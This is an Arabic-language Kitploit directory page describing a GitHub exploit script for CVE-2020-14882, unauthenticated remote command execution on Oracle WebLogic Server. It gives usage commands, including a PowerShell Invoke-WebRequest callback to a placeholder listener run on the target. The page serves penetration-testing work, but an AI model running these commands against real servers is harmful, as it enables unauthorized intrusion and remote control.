Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2020-14882 — يسمح هذا السكربت بتنفيذ الأوامر عن بُعد (RCE) على Oracle WebLogic Server | Kitploit
أدوات/GitHubGitHub/danny-lli/cve-2020-14882
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقأداة الوصول عن بعد
GitHubdanny-lli/cve-2020-14882

CVE-2020-14882

يسمح هذا السكربت بتنفيذ الأوامر عن بُعد (RCE) على Oracle WebLogic Server

عرض المستودع
216منذ 3 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2020-14882

يتيح هذا النص البرمجي تنفيذ الأوامر عن بُعد (RCE) على Oracle WebLogic Server باستخدام طلب GET غير موثوق. يستغل الثغرة الأمنية CVE-2020-14882. من خلال تنفيذ أوامر عشوائية، يمكن للمهاجم الوصول غير المصرح به إلى الخادم.

تفاصيل الاستغلال

  • عنوان الاستغلال: Oracle WebLogic Server، تنفيذ أوامر عن بُعد غير موثوق عبر طلب GET
  • مؤلف الاستغلال: Danny Safaya
  • CVE: CVE-2020-14882
  • الصفحة الرئيسية للبائع: Oracle WebLogic Server
  • رابط البرنامج: Oracle Middleware Downloads
  • مزيد من المعلومات: تحليل WebLogic RCE عبر طلب GET واحد (CVE-2020-14882)

الاستخدام

تأكد من أن لديك Python 3 مثبتًا. لاستخدام هذا النص البرمجي، اتبع الخطوات أدناه:

  1. افتح محطة أو موجه أوامر.

  2. قم بتشغيل النص البرمجي باستخدام الأمر التالي:

    python3 exploit.py http(s)://target:7001 command
    

    استبدل http(s)://target:7001 بعنوان URL الهدف لخادم Oracle WebLogic، وcommand بالأمر المطلوب تنفيذه.

    المثال 1:

    python3 exploit.py http(s)://target:7001 "nslookup your_Domain"
    

    هذا المثال ينفذ الأمر nslookup your_Domain على الخادم الهدف.

    المثال 2:

    python3 exploit.py http(s)://target:7001 "powershell.exe -c Invoke-WebRequest -Uri http://your_listener"
    

    هذا المثال ينفذ أمر PowerShell Invoke-WebRequest -Uri http://your_listener على الخادم الهدف.

تحذير

هذا النص البرمجي مخصص فقط لاختبار الاختراق المصرح به وأغراض البحث الأمني. الاستخدام غير المصرح به لهذا النص البرمجي لاستغلال الأنظمة دون موافقة مناسبة غير قانوني وقد يؤدي إلى عواقب قانونية. استخدمه على مسؤوليتك الخاصة.

التبعيات

يتطلب هذا النص البرمجي التبعيات التالية:

  • requests
  • urllib3

يرجى التأكد من تثبيت هذه التبعيات قبل تشغيل النص البرمجي.


تنزيل الأداة